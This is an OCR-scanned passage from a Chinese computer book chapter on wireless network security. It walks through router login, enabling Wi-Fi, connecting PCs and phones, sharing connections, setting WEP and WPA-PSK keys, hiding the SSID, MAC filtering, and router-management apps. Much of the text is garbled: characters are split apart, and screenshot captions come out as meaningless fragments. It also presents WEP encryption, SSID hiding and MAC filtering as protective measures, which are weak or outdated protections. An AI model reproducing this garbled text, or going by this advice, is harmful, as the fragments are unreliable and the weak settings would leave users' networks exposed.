[sep 回 打开 IE 浏览 器 ， 在 地 址 栏 中 输入 路 由 
器 的 网 址 ， 一 般 情况 下 路 由 器 的 默认 网 址 
为 “192.168.0.1”， 输 入 完毕 后 单 击 “ 转 
至 ”按钮 ， 即 可 打开 路 由 器 的 登录 窗口 。 


口 TreesN x ET 
家 © | rn 充 | 至 万 站.… 
TP-LINK 
理 抽 
十 到 


在 “请 输入 管理 员 密 码 ” 文 本 框 中 输 
入 管理 员 的 密码 ， 默 认 情 况 下 管理 员 的 密 
码 为 123456。 


口 TEweesN x 国 a 
Ee Oo 去 | 三 六 全 
TIP-LINK 


[step 图 单 去 “确认 ”按钮 ， 即 可 进入 路 由 器 
的 “运行 状态 ”工作 界面 ， 在 其 中 可 以 查 


看 路 由 器 的 基本 信息 。 


TIP-LINK- 


i 4 400 ie 
Ee sn Loonong 


[Step 加 选择 窗口 左 侧 的 “无 线 设置 ”选项 ， 
在 打开 的 子 选项 中 选择 “基本 信息 ” 选 
项 ， 即 可 在 右 侧 的 窗 格 中 显示 无 线 设置 的 
基本 功能 ， 并 分 别名 选 “ 开 启 无 线 功能 ” 
复 选 框 和 “开启 SSID 广 播 ” 复 选 框 。 


Drewpaasy x 王 3 


oa 女 | 三 中 和. 


TIP-LINNK ss | 


step 园 当 开 启 路 由 器 的 无 线 功能 后 ， 单 击 


“保存 ”按钮 进行 保存 ， 然 后 重新 启动 路 
由 器 ， 即 可 完成 无 线 网 的 设置 ， 这 样 具有 
WiFi 功 能 的 手机 、 电 脑 、iPad 等 电子 设备 就 
可 以 与 路 由 器 进行 无 线 连 接 ， 从 而 实现 共 
享 上 网 。 


17.1.3 ”将 电脑 接 入 无 线 网 


笔记 本 电脑 具有 无 线 接 入 功能 ， 台 式 
电脑 要 想 接 入 无 线 网 ， 需 要 购买 相应 的 无 
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线 接收 器 。 这 里 以 笔记 本 电脑 为 例 ， 介 绍 
如 何 将 电脑 接 入 无 线 网 ， 具 体 的 操作 步骤 
如 下 。 

[step 图 双 去 笔记 本 电脑 桌面 右 下 角 的 无 线 
连接 图 标 ， 打 开 “ 网 络 和 共享 中 心 ” 窗 
口 ， 在 其 中 可 以 看 到 本 台电 脑 的 网 络 连 接 


| -网 二 和 共享 中 
li 二 看 亲本 网 络 信 息 并 设置 连 按 
i 至 大 二 网 者 


你 目前 没有 过 要 列 任何 网 交 . 


的 过 二 或 网络 
本 刘 志 、 扰 开 VPN 运 雪 ; 职 疫 生路 新 到 大 入 吉 。 
Ca 
和 网 渍 所 是 古寺 下 得 由 允 册 入 时 


step 图 单 击 笔记 本 电脑 桌面 右 下 角 的 无 线 连 


接 图 标 ， 在 打开 的 界面 中 显示 了 电脑 自动 
搜索 的 无 线 设备 和 信和 号 。 


宽带 连接 
mywif 
666666 
# family 


fhpre-H5TF 


TP-LINK1 


TP-LINK 6666 


BE 单 去 一 个 无 线 连 接 设备 ， 展 开 无 线 时 
连接 功能 ， 在 其 中 义 选 “自动 连接 ” 复 久 
选 框 。 
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A mywifi 


ChinaNet-H5TF 


= family 


单 击 “连接 ”按钮 ， 在 打开 的 界面 中 
输入 无 线 连接 设备 的 连接 密码 。 


zs mywifi 
2 666666 
a 
ChinaNet-H5TF 
去 
family 


TP-LINK’ 


单 击 “ 下 一 步 ” 按 钮 ， 开 始 连接 
网 络 。 


寺 TP-UNKI 


Step 关连 接 到 网 络 后 ， 桌 面 右 下 角 的 无 线 连 
接 设 备 显示 正常 ， 并 以 弧 线 的 方法 给 出 信 


号 的 强 弱 。 


[Sep 图 再 次 打开 “网 络 和 共享 中 心 ” 窗 
口 ， 在 其 中 可 以 看 到 这 台电 脑 当 前 的 连接 
状态 。 
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一 
和 ， 网 阁 和 共享 中 心 ~ | 可。 | 过半 2 司 面 和 4 
二 看 基本 网 络 信息 并 设置 连 安 
本 看 活动 网 阁 
a TTP-UNKD | 
要 改 网 络 设置 


部。 本 新 的 过 1 或 网 洛 
和 二 高 大 、 毛 S VPN 连 廊 ; 或 设 和 中 由 寻 或 接 入 点 .| 


司 aass 生 
准 新 并 侦 挟 网 阁 有 是 ,或 者 政 得 纸 礁 解 革 信息 。 


17.1.4 将 手机 接 入 Wiri 


无 线 局 域 网 配置 完成 后 ， 用 户 可 以 将 
手机 接 入 WiFi， 从 而 实现 无 线 上 网 。 手 机 
接 入 WiFi 的 具体 操作 步骤 如 下 。 

[sep 图 在 手机 界面 中 用 手指 点 按 “ 设 置 ” 图 
标 ， 进 入 手机 的 “设置 ”界面 。 


下 午 2:44 全 疝 届 中国 电信 CE 57% 
设置 
和 @ 移动 网 络 
会 WLAN 已 关闭 
© 于 已 关闭 
其 他 连接 方式 


使 用 手指 点 按 WLAN 右 侧 的 “已 关 
闭 ”， 开 启 手机 WLAN 功 能 ， 并 自动 搜索 
周围 可 用 的 WLAN。 


WLAN 


开启 WLAN . 


ChinaNet-H5TF 
TP-UNK1 
TP-UNKZ 
TP-LINK_38F156 
TP-LINK_6666 
fhpre-H5TF 
ywif 


6 


step 图 使 用 手指 点 按 下 面 可 用 的 WLAN， 弹 
出 连接 界面 ， 在 其 中 输入 相关 密码 。 


TP-LINK1 


[一 | [ee] 
edulelelalylulalelel 


Sze 
HT-LEE 


点 按 “ 连 接 ” 按 钮 ， 即 可 将 手机 接 入 
WiFi， 并 在 下 方 显示 “已 连接 ”字样 ， 这 
样 手机 就 接 入 了 WiFi， 然 后 就 可 以 使 用 手 
机 进行 上 网 了 。 


TS 952Ks 上 日 ES 


WLAN 


开局 WLAN 全 


TP-LINK1 


ChinaNet-H5TF 
TP-LINK2 


fhpre-H5TF 


17.2 ”电脑 和 手机 共享 无 线 上 网 


随 着 网 络 和 手机 上 网 的 普及 ， 电 脑 和 
手机 的 网 络 是 可 以 互相 共享 的 ， 这 在 一 定 程 
度 上 方便 了 用 户 ， 例 如 : 如 果 手 机 共享 电脑 
的 网 络 ， 则 可 以 节省 手机 的 上 网 流量 ;如 果 


第 17 章 无 线 网 络 安全 的 防护 策略 
自己 的 电脑 不 在 有 线 网 络 环境 中 ， 则 可 以 利 
用 手机 的 流量 进行 电脑 上 网 。 


17.2.1 手机 共享 电脑 的 网 络 


电脑 和 手机 网 络 的 共享 需要 借助 第 三 吕 


方 软件 ， 这 样 可 以 使 整个 操作 简单 方便 ， 
这 里 以 借助 360 免 费 WiFi 软 件 为 例 进行 介 
绍 ， 具 体 的 操作 步骤 如 下 。 


[Eee 国 将 电脑 接 入 WiFi 环 境 中 。 
竺 网 站 和 共事 让 必 一 
个 笔 < 网 络 和 .，， 网络 和 共享 中 心 ~ 已。 这 表 控 面板 p 
这 机 面 主页 查看 基本 网 络 信息 并 设置 连接 
得 看 寺 避 风 吉 
二 
更 区 训 级 共享 汉王 Tp-UNKY Internet 


过 本 。 盟 WLAN 


en (TP-UNKD) 


更 改 网 络 疫 年 
Wh eas 
设置 窜 这、 排 号 或 VPN 湛 党 , 或 淮 置 小 帕 麻 或 溢 入 点 
国 ens 
诊 时 并 修复 网 奖 题 “或 者 于 浊 了 于 解答 守 思 . 


Internet 运 项 
Windows 防火 二 
二 


在 电脑 中 安装 360 免 费 WiFi 软 件 ， 然 
后 打开 其 工作 界面 ， 在 其 中 设置 WiFi 名 称 
与 密码 。 


350%ewn 卓 寺 x 


全 


六 全 防护 中 


WIFI 己 开启 ， 芯 他 手机 连接 吧 


step 图 打开 手机 的 WLAN 搜 索 功 能 ， 可 以 
看 到 搜索 出 来 的 WiFi 名 称 ， 如 这 里 是 “LB- 
LINKI* 
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L [Sep 图 返回 到 电脑 工作 环境 中 ， 在 “360 免 
和 费 WiFi” 的 工作 界面 中 选择 “已 经 连接 的 

; 手机 ”选项 卡 ， 则 可 以 在 打开 的 界面 中 查 
看 通过 此 电脑 上 网 的 手机 信息 。 


3EORRWwr 


LB-LINK1 


mywifi 


ChinaNet-H5TF 


| 


TP-LINK 990A 

MERCURY. 42952A 

分 
Step 加 使 用 手指 点 按 “LB-LINK1”， 即 可 
打开 WiFi 连 接 界面 ， 在 其 中 输入 密码 。 


汪 已 光 拉 的 手机 


17.2.2 ”电脑 共享 手机 的 网 络 


手机 可 以 共享 电脑 的 网 络 ， 电 脑 也 
可 以 共享 手机 的 网 络 ， 具 体 的 操作 步 又 
如 下 。 

[step 加 打开 手机 ， 进 入 手机 的 设置 界面 ， 
在 其 中 使 用 手指 点 按 “ 便 携 式 WLAN 热 
点 ”， 开 启 手机 的 便携 式 WLAN 热 点 


功能 。 


[step 园 点 按 “ 连 接 ” 按 钮 ， 手 机 就 可 以 通过 
电脑 发 出 来 的 WiFi 信 号 进行 上 网 了 。 


Step 图 返回 到 电脑 的 操作 界面 ， 单 击 右 下 角 
的 无 线 连 接 图 标 ， 在 打开 的 界面 中 显示 了 
电脑 自动 搜索 的 无 线 设 备 和 信号 ， 这 里 就 


Tenda_1BF8F0 


人 可 以 看 到 手机 的 无 线 设备 信息 “HUAWEI 
C8815”， 单 击 手 机 无 线 设备 。 
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质 TP-UNKI 


四 
8 HUAWEI C8815 


step 回 打开 其 连接 界面 ， 单 击 “连接 ” 
按钮 。 


质 TP-UNKI 


A 


此 时 ， 可 以 看 到 正在 将 电脑 通过 手机 
设备 连接 网 络 。 


质 TP-UNKI 


pa 


9 C8815 
9 HUAWEIC881 


正在 连接 


[Eee 图 连接 成 功 后 ， 在 手机 设备 下 方 显示 
“已 连接 ， 开 放 ” 信 息 ， 其 中 的 “开放 ” 
表示 该 手机 设备 没有 进行 加 密 处 理 。 


四 可 
4 HUAWEI C8815 


顽 TP-UNK1 


人质 666666 


移 提 示 : 至 此 ， 就 完成 了 电脑 通过 手机 上 
网 的 操作 ， 这 里 需要 注意 的 是 一 定 要 注意 
手机 的 上 网 流量 。 


17.3 ”无 线 网 络 的 安全 策略 


无 线 网 络 不 需要 物理 线 缆 ， 非 常 方 
便 ， 但 正 因 为 无 线 需要 靠 无 线 信号 进行 
信息 传输 ， 而 无 线 信号 又 管理 不 便 ， 所 以 
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数据 的 安全 性 更 是 遭 到 了 前 所 未 有 的 挑 
战 ， 于 是 ， 各 种 各 样 的 无 线 加 密 算法 应 运 
而 生 。 


17.3.1 设置 管理 员 密码 量 
路 由 器 的 初始 密码 比较 简单 ， 为 了 保全 

证 局 域 网 的 安全 ， 一 般 需要 修改 或 设置 管 

理 员 密码 ， 具 体 的 操作 步骤 如 下 。 

[step 轩 打开 路 由 器 的 Web 后 台 设置 界面 ， 选 

择 “ 系 统 工具 ”选项 下 的 “修改 登录 密码 ” 

选项 ， 打 开 “ 修 改 管理 员 密码 ”工作 界面 。 


日 mwsssN x 车 


这 © | 191080 六 | 三 思 


HE 
亲本: 


询 认 新 二 


zl 


[Bp 加 在 “ 原 密码 ”文本 框 中 输入 原来 的 
密码 ， 在 “新 密码 ”文本 框 和 “确认 新 密 
码 ”文本 框 中 输入 新 设置 的 密码 ， 最 后 单 
击 “ 保 存 ” 按 钮 即 可 。 


本 页 人 有 的 守 昌 页 击 机 ， 卡 度 e-15 位 。 


HE: eeee 


Dea 


17.3.2 无 线 网 络 WEP 加 密 

WEP 采 用 对 称 加 密 机 理 ， 数 据 的 加 密 
和 人 解密 采用 相同 的 密 钥 和 加 密 算法 。 下 面 
详细 介绍 无 线 网 络 WEP 加 密 的 具体 方法 。 


1. 设置 无 线路 由 器 WEP 加 密 数 据 


打开 路 由 器 的 Web 后 台 设 置 界面 ， 单 击 
左 侧 “ 无 线 设置 ”一 “基本 设置 ”选项 ， 
色 选 “开启 安全 设置 ” 复 选 框 ， 在 “安全 
类 型 ”下 拉 列 表 中 选择 “WEP” 选 项 ， 在 
“ 密 钥 格 式 选 择 ” 下 拉 列 表 中 选择 “ASCII 
码 ” 选 项 。 设 置 密 钥 ， 在 “ 密 钥 1” 后 面 
的 “ 密 钥 类 型 ”下 拉 列 表 中 选择 “64 位 ” 
选项 ， 在 “ 密 钥 内 容 ” 文 本 框 中 输入 要 使 
用 的 密码 ， 本 实例 输入 密码 为 cisco， 单 击 
“保存 ”按钮 。 


窑 全 达 而 :+ 
38 依 式 志 天 


顾 一 一 避 
sl 


这 折 4 亿 韦 包租 入 1 过 制 半生 0 个 ， 台 圭 SCII 
5 十 ， 计 树 120 从 室 久 要 办 入 


16 汗 秀才 字 葵 20 
5 


Sr 
EE 十 明 内 末 
Sa! © |[Ee 


2. 客户 端 连接 
需要 WEP 加 密 认证 的 无 线 客户 端 连接 
的 具体 操作 步骤 如 下 。 
单 击 系统 桌面 右 下 角 的 辆 图 标 ， 无 
线 客户 端 自动 扫描 到 区 域内 的 所 有 无 线 
信号 。 
Eee 
上 eve oa 


无 线 网 阁 连 接 


tp-fink 


Step 图 右 击 “tp-link” 信 号 ， 在 弹出 的 快捷 
菜单 中 选择 “连接 ”选项 。 
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法 接 到 : Be 
= 未 识 别 的 网 络 

TY 无 Intemet 访 问 

无 线 网 阁 连 接 ~ 
ek 过 接 | 十 
tg: F | 
34 Ee 
TP-UNK_SW 

| 打开 网 阁 和 共享 中 心 


[step 图 弹出 “连接 到 网 络 ” 对 话 框 ， 在 “ 安 
全 密 钥 ”文本 框 中 输入 密码 cisco， 单 击 
“确定 ”按钮 。 


单 击 系统 桌面 右 下 角 的 圆 图 标 ， 将 光 
标 放 在 “tp-link” 信 号 上 ， 可 以 看 到 无 线 信 
号 的 连接 情况 ， 如 下 图 所 示 表 明 已 经 成 功 
连接 无 线路 由 器 。 

当前 连接 到 : 


tp-link 
无 Internet 访问 


区 一 未 识别 的 网 络 
无 Internet 访问 


无 线 网 络 连 接 


KEE a07.119 | ， 
| ssip:tp-link a 


17.3.3 ”WPA-PSK 安 全 加 密 算法 


WPA-PSK 可 以 看 成 是 一 个 认证 机 制 ， 
只 要 求 一 个 单一 的 密码 进入 每 个 无 线 局 域 


网 节点 《例如 无 线路 由 器 ) ， 只 要 密码 正 
确 ， 就 可 以 使 用 无 线 网 络 。 下 面 介绍 如 何 
使 用 WPA-PSK 或 者 WPA2-PSK 加 密 无 线 
网 络 。 


1. 设置 无 线路 由 器 WPA-PSK 安 全 加 密 
数据 


[step 图 打开 路 由 器 的 Web 后 人 台 设 置 界面 ， 
选择 左 侧 “无 线 设 置 ” 一 “基本 设置 ” 选 
项 ， 匀 选 “ 开 启 安全 设置 ” 复 选 框 ， 在 
“安全 类 型 ”下 拉 列 表 中 选择 “WPA-PSK/ 
WAP2-PSK” 选 项 ， 在 “安全 选项 ”下 拉 
列表 和 “加 密 方法 ”下 拉 列 表 中 分 别 选择 
“自动 选择 ”选项 ， 在 “PSK 密码 ”文本 
框 中 输入 加 密 密 码 ， 本 实例 设置 密码 为 
sushi1986。 


卫 开启 无 线 功能 
也 允许 ssTD 广 播 


万 开启 Bridge 功 能 
安全 提示 :为 保障 网 络 安全 ， DEF。 并 使 用 
WPA-PSK/WPA2-FSK 


也 开启 安全 设置 


安全 类 型 : EE 

安全 选 硕 : [可 

加 方法 : EEEEE| 

SI: 最 短 为 6 个 字符 ,最 长 为 63 个 字符 

ER 

组 密 钥 更 新 周期: 。 [86400 |( 单 位 为 秒 ,最 小 值 为 30, 不 更 新 i 为 0) 


[保存 | [要 网 | | 
step 图 单 直 “保存 ”按钮 ， 弹 出 一 个 提示 对 
话 框 ， 单 击 “确定 ” 按 钮 ， 重 新 启动 路 由 
器 即 可 。 


192.168.1.1 上 的 网 页 显示 : 


确认 重新 启动 路 白 器 ? 


确定 取消 


2. 使 用 WPA-PSK 安 全 加 密 认证 的 无 线 
客户 端 


[Sees 国 单 去 系统 桌面 右 下 角 的 辆 图 标 ， 无 线 
客户 端 会 自动 扫描 区 域内 的 无 线 信 号 
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当前 连接 到 


ES 
无 Internet 访问 
元 线 网 认 连 二 


tp-link 


[ee 图 右 击 “tp-link” 信 号 ， 在 弹出 的 快捷 
和 a 选项 。 


| 法 于 


| 攻 HRSMRI 


无 Internet 访 同 


TP-UNKSW si 


打开 网 络 和 共享 中 心 | 


[step 图 弹出 “连接 到 网 络 ” a 在 “ 安 
全 密 钥 ”文本 框 中 输入 密码 sushi1986， 单 
击 “ 确 定 ” 按 钮 。 


键入 网 络 安全 密 钥 


安全 密 角 (5h sushil986 


器 降 营 闻 符 (H) 


[see 四 单 击 系统 桌面 右 下 角 的 圈 图 标 ， 将 光 
标 放 在 “tp-link” 信 号 上 ， 可 以 看 到 无 线 信 
号 的 连接 情况 ， 如 下 图 所 示 表 明 已 经 成 功 
连接 无 线路 由 器 。 

移 提 示 : 在 WPA-PSK 加 密 算 法 的 使 用 过 程 
中 ， 密 码 设置 应 该 尽 可 能 复杂 ， 并 且 要 注 
意 定 期 更 换 密 码 。 
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相 


当前 连接 到 : 4 


tp-link 
Internet 访问 


语 Re se 

无 网络 连 接 i 
tp-link 
tzgs 
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安全 类 型: 

无 ;型 : 802.11g | ， 

TP-LUNK SW | ssiD: tp-link 下 
| 打开 网 阁 和 共享 中 心 


17.3.4 禁用 SSID 广 播 


SSID 就 是 一 个 无 线 网 络 的 名 称 ， 无 线 
客户 端 通过 无 线 网 络 的 SSID 来 区 分 不 同 的 
无 线 网 络 。 为 了 安全 起 见 ， 往 往 要 求 无 线 
AP 禁止 广播 该 SSID， 只 有 知道 该 无 线 网 络 
SSID 的 人 员 才 可 以 进行 无 线 网 络 连 接 。 


1. 设置 无 线路 由 器 禁用 SSID 广 播 


无 线路 由 器 禁用 SSID 广 播 的 具体 操作 
步骤 如 下 。 
打开 路 由 器 的 Web 后 台 设置 界面 ， 
设置 自己 无 线 网 络 的 SSID 信 息 ， 取 消 勾 选 
“允许 SSID 广 播 ” 复 选 框 ， 单 击 “ 保 存 ” 
按钮 。 


本 页 面 设置 路 由 器 无 线 网 络 的 基本 参数 和 安全 认证 选项 > 


SSm 呈 : ssh 
频段 : 
模式 : abps 02. 11e) 3] 


隐 开启 无线 功能 
厂 和 issmmr 括 


EE 
安全 提示 :为 人 聊 网 络 安全 ， 强 到 推 逢 开启 安全 设置 ， 并 使 有 
PA-PSW/PA2-YSK AES 加 方法 


耳 开启 安全 设置 
安全 类 型 : WPA-PSK/WPA2-PSK | 
安全 选项 ; 下 动迁 泽 本 


step 较 弹出 一 个 提示 对 话 框 ， 单 击 “确定 ” 
按钮 ， 重 新 启动 路 由 器 。 
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192.168.1.1 上 的 网 页 显示 : 


确认 重新 启动 路 扬 刁 ? 
确定 取消 
2. 客户 端 连接 
禁用 SSID 广 播 的 无 线 客户 端 连接 的 具 
体操 作 步 又 如 下 。 


[step 图 单 去 系统 桌面 右 下 角 的 圆 图 标 ， 会 看 
到 无 线 客户 端 自动 扫描 到 区 域内 的 所 有 无 
线 信 号 ， 会 发 现 其 中 没有 SSID 为 “ssh” 的 
无 线 网 络 ， 但 是 会 出 现 一 个 名 称 为 “其 他 
网 络 ” 的 信号 。 


当前 连接 到 : 


==3 未 识别 的 网 络 
TY 无 Internet 沪 问 


无 网 络 连 接 
tgs 
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SW-IT 
TP-UNK SW 
下 人 网 培 


右 击 “其 他 网 络 ”， 在 弹出 的 快捷 菜 
单 中 选择 “连接 ”选项 。 

当前 连接 到 

二 Rms 


天 网络 演 接 


step 国 弹出 “连接 到 网 络 ” 对 话 框 ， 在 “名 
称 ” 文 本 框 中 输入 要 连接 网 络 的 SSID 号 ， 
本 实例 这 里 输入 ssh， 单 击 “ 确 定 ” 按 钮 。 


键入 网 络 的 名 称 (SSID) 


各 称 (A): ssh 


step 贺 在 “安全 密 钥 ”文本 框 中 输入 无 
线 网 络 的 密 钥 ， 本 实例 这 里 输入 密 负 
sushi1986， 单 击 “ 确 定 ” 按 钮 。 


键入 网 络 雪 全 密 钥 


安全 而 (5)} ushi1986 


回忆 过 字 入 (4) 


[step 图 单 击 系统 桌 面 右 下 角 的 轿 图 标 ， 将 
光标 放 在 “ssh” 信 号 上 可 以 看 到 无 线 网 络 
的 连接 情况 ， 如 下 图 所 示 表 明 无 线 客户 端 
已 经 成 功 连接 到 无 线路 由 器 。 


| 村 


二 未 识别 的 网 络 
无 Internet 访问 


佛 记 
Internet 访问 


到 类 型 | 802.119 
CMcdssipsssh 


17.3.5 ”媒体 访问 控制 地 址 过 滤 


网 络 管理 的 主要 任务 之 一 就 是 控制 客 
户 端 对 网 络 的 接 入 和 对 客户 端的 上 网 行为 
进行 控制 ， 无 线 网 络 也 不 例外 ， 通 常 无 线 
AP 利用 媒体 访问 控制 (MAC) 地 址 过 滤 的 
方法 来 限制 无 线 客户 端的 接 入 。 

使 用 无 线路 由 器 进行 MAC 地 址 过 滤 的 
有 具体 操作 步骤 如 下 。 
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[step 图 打开 路 由 器 的 Web 后 台 设置 界面 ， 单 击 
左 侧 “无 线 设置 ”一 “无 线 MAC 地 址 过 滤 ” 
选项 ， 默 认 情 况 下 MAC 地 址 过 滤 功 能 是 关闭 
状态 ， 单 击 “ 启 用 过 滤 ” 按 钮 ， 开 局 MAC 地 


可 页 访 于 MK 地址 过 尖 来 控 和 计 其 机 对 到 无 续 R&EBT 问 


到 C 闻 HH 堪 功能: 已 关闭 
Bm 
人 允许 列 天 中 生 午 规 MN 之 83MC 地 址 访问 本 无 撒 络 
CC 禁止 列表 中 生 冰 机 则 之 外 和 9 地址 访问 本 无 圭 5 结 


ED Wi 基 王 询 到 | 拔 运 | 医 -也 到 | 
Ei 
[EJ 


[step 图 打开 “MAC 地 址 过 滤 ” 对 话 框 ， 

在 “MAC 地 址 ”文本 框 中 输入 无 线 客 户 
端的 MAC 地 址 ， 本 实例 输入 MAC 地 址 为 
00-0C-29-5A-3C-97， 在 “描述 ”文本 框 中 输 
入 MAC 描 述 信息 为 sushipc， 在 “类 型 ”下 拉 
列表 中 选择 “允许 ”选项 ， 在 “状态 ”下 拉 
列表 中 选择 “生效 ”选项 ， 依 照 此 步骤 将 所 
有 合法 的 无 线 客户 端的 MAC 地 址 加 入 到 此 
MAC 地 址 表 后 ， 单 击 “ 保 存 ” 按 钮 。 


本 页 设备 4c 地 址 过 省 未 近 制 计算 机 对 本 无 过 同 络 的 访问 。 


病 述 : Cashipe 
关 到 [可 
汰 态 + 5 至 现 
保存 ] [到 加 | [机 二 


[step 图 选中 “过 滤 规 则 ”选项 下 的 “禁止 
单 选 按钮 ， 表 明 在 下 面 MAC 列 表 中 生效 规 
则 之 外 的 MAC 地 址 可 以 访问 无 线 网 络 。 


本 页 设置 whc 节 Hb 天 未 近 制 寺 茎 机 允 术 天 可 的 访问 


nc 地 直 过 小 功能 : 
EE 

个 多 许 列表 中 生 交规 RI 之 站 和 NMC 地 址 访问 本 无 续 同 结 
| 个 要 上 列 吉 中 生 节 项 DI 之 4|9 和 NA 地 址 访问 本 无线 同 络 


已 关闭 。 [到 | 


| TREE EE [| 编辑 
[eam | NF ip [EE 
EE 
本 到 | 


[step 图 这 样 无 线 客户 端 在 访问 无 线 AP 时 ， 
会 发 现 除 了 MAC 地 址 表 中 的 MAC 地 址 外 ， 
其 他 的 MAC 地 址 无 法 访问 无 线 AP， 也 就 无 
法 访问 互联 网 。 
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17.4 无 线路 由 器 的 安全 管理 
工具 
使 用 无 线路 由 管理 工具 可 以 方便 管理 
无 线 网 络 中 的 上 网 设备 ， 本 节 就 来 介绍 两 


个 无 线路 由 安全 管理 工具 ， 包 括 《360 路 由 
器 卫士 》 与 《路 由 优化 大 师 》。 


《360 路 由 器 卫士 》 


17.4.1 


《360 路 由 器 卫士 》 是 一 款 由 360 官 方 推 
出 的 绿色 、 免 费 的 家 庭 必 备 无 线 网 络 管理 
工具 。《360 路 由 器 了 卫士》 软件 功能 强大 ， 
支持 几乎 所 有 的 路 由 器 。 在 管理 的 过 程 
中 ， 一 旦 发 现 足 网 设备 想 禁止 就 禁止 。 下 
面 介绍 使 用 《360 路 由 器 卫士 》 管 理 网 络 的 
操作 方法 。 

下 载 并 安装 《360 路 由 器 卫士 》， 双 击 
桌面 上 的 快捷 图 标 ， 打 开 “ 路 由 器 卫士 ” 
工作 界面 ， 提 示 用 户 正 在 连接 路 由 器 。 


[step 图 连接 成 功 后 ， 弹 出 “路 由 器 卫士 提 
醒 您 ”对 话 框 ， 在 其 中 输入 路 由 器 账号 与 


密码 。 


请 输入 您 的 路 由 器 帐号 和 密码 


ape 


胸 直 帐号。 win 


路 由 码 。 oooss 
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[step 图 单 去 “下 一 步 ” 按 钮 ， 进 入 “我 的 路 
由 ”工作 界面 ， 在 其 中 可 以 看 到 当前 的 在 
线 设 备 。 


[sep 园 如 果 想 要 对 某 个 设备 限 速 ， 则 可 以 单 
击 设备 后 的 “ 限 速 ”按钮 ， 打 开 “ 限 速 ” 
对 话 框 ， 在 其 中 设置 设备 的 上 传 速 度 与 下 
载 速度 ， 设 置 完毕 后 单 击 “ 确 认 ” 按 钮 即 
可 保存 设置 。 


下 王 运 度 职 和 qd Ka/e~ 
0 到 示 不 限 速 ,其 高 限 带 10M 


[step 较 在 管理 的 过 程 中 ， 一 旦 发 现 有 蹦 网 
设备 ， 可 以 单 击 该 设备 后 的 “禁止 上 网 ” 
按钮 。 


step 较 禁止 上 网 后 ， 选 择 “ 黑 名 单 ” 选 项 
卡 ， 进 入 “ 黑 名 单 ” 设 置 界面 ， 在 其 中 可 
以 看 到 被 禁止 的 上 网 设备 。 


选择 “路 由 防 黑 ” 选 项 卡 ， 进 入 “路 
由 防 黑 ”设置 界面 ， 在 其 中 可 以 对 路 由 器 
进行 防 黑 检 测 。 


路 由 器 还 未 做 过 防 黑 检测 


Pr rose 
nan 


eeooo 


step 图 单 去 “立即 检测 ”按钮 ， 即 可 开始 对 
路 由 器 进行 检测 ， 并 给 出 检测 结果 。 


W 


[step 图 选择 “路 由 跑 分 ”选项 卡 ， 进 入 “路 
由 跑 分 ”设置 界面 ， 在 其 中 可 以 查看 当前 
路 由 器 信息 。 


您 的 路 由 器 能 抵御 黑客 和 人 侵 ， 请 放心 上 网 


@ DHCP 和 DNS 到 全 ,上册 < 晤 可 尖 se 
© UMAEMUEST, TERE 2 
© ER TENT EA = 
9 i 全， 不 加 全 串 占 科 2 
© Wire , FREAEN 2 
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step 四 单 去 “开始 跑 分 ”按钮 ， 即 可 开始 评 
估 当 前 路 由 器 的 性 能 。 


oraamaa 5005 ,sanz 103692 2 MT2a ou5 本 2 


Du Din sooM 1 II 
nnacow Er 


step 辆 评估 完成 后 ， 会 在 “路 由 跑 分 ”界面 
中 给 出 跑 分 排行 榜 信 息 。 


路 由 网 分 排行 榜 


step 顶 选择 “路 由 设置 ”选项 卡 ， 进 入 “路 


由 设置 ”界面 ， 在 其 中 可 以 对 宽带 上 网 、 


WiFi 密 码 、 路 由 器 密码 等 选项 进行 设置 。 


路 由 器 卫士 


Om| mm | 人 


RIR 


TO24RSAR 28(DAESl0 检 了 号 站 直到 


NNN 开 ,请 辐 开 局 


路 由 时 光 机 


step 图 选择 “路 由 时 光 机 ”选项 ， 在 打开 


的 界面 中 单 击 “ 立 即 开启 ”按钮 ， 即 可 打 
开 “ 时 光 机 开启 ”设置 界面 ， 在 其 中 输入 
360 账 号 和 密码 ， 然 后 单 击 “ 立 即 登 录 并 开 
启 ” 按 钮 ， 即 可 开启 时 光 机 。 
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章 录 您 的 360 手 机 帐号 即 可 开启 时 光 相 


[Eee 加 选择 “宽带 上 网 ”选项 ， 进 入 “宽带 
上 网 ”界面 ， 在 其 中 输入 网 络 运 营 商 给 出 
的 上 网 账号 和 密码 ， 单 击 “ 保 存 设 置 ” 按 
人 钮 ， 即 可 保存 设置 。 


宽带 上 网 


step 图 选择 “WiFi 密 码 ” 选 项 ， 进 入 “WiFi 
密码 ”界面 ， 在 其 中 输入 WiFi 密 码 ， 单 击 
“保存 设置 ”按钮 ， 即 可 保存 设置 。 
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Step 加 选择 “重启 路 由 器 ”选项 ， 进 入 “ 重 
启 路 由 器 ”界面 ， 单 击 “ 重 启 ” 按 钮 ， 即 
可 对 当前 路 由 器 进行 重启 操作 。 


[see 图 使 用 《360 路 由 器 卫士 》 在 管理 无 线 
网 络 安 全 的 过 程 中 ， 一 旦 检测 到 有 设备 通 
过 路 由 器 上 网 ， 就 会 在 电脑 桌面 的 右上 角 


ea 
“iPhone%... 上 线 了 


单 击 “ 管 理 ” 按 钮 ， 打 开 该 设备 的 详 


细 信 息 界 面 ， 在 其 中 可 以 对 网 速 进行 限制 
管理 ， 最 后 单 击 “确认 ”按钮 即 可 。 


OKB/s 
nm 


17.4.2 《路 由 优化 大 师 》 


《路 由 优化 大 师 》 是 一 款 专 业 的 路 由 器 
设置 软件 ， 其 主要 功能 有 一 键 设置 优化 路 
由 、 屏 广告 、 防 蹦 网 、 路 由 器 全 面 检测 及 
高 级 设置 等 ， 从 而 保护 路 由 器 安全 。 

使 用 《路 由 优化 大 师 》 管 理 无 线 网 络 
安全 的 具体 操作 步 又 如 下 。 

[step 图 下 载 并 安装 《路 由 优化 大 师 》， 双 击 
桌面 上 的 快捷 图 标 ， 即 可 打开 “路 由 优化 
大 师 ” 的 工作 界面 。 


step 图 单 去 “和 登录” 按钮， 打开 “RMTools” 
窗口 ， 在 其 中 输入 管理 员 密码 。 
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@ RMTools - 0O x 


有 | | 局 虹 | | 美 半 | 中 由 礼 于 Rt: hr/192.168.0.1 |[ 的 


TLAWRS86N 


[step 图 单机 “确定 ”按钮 ， 即 可 进入 路 由 器 
工作 界面 ， 在 其 中 可 以 看 到 主人 网 络 和 访 
客 网 络 信息 。 


step 回 单 去 “设备 管理 ”图 标 ， 进 入 “设备 
管理 ”工作 界面 ， 在 其 中 可 以 看 到 当前 无 
线 网 络 中 的 连接 设备 。 


[Se 图 如 果 想 要 对 某 个 设备 进行 管理 ， 则 可 
以 单 击 “ 管 理 ” 按 钮 ， 进 入 该 设备 的 管理 
界面 ， 在 其 中 可 以 设置 设备 的 上 传 速度 、 
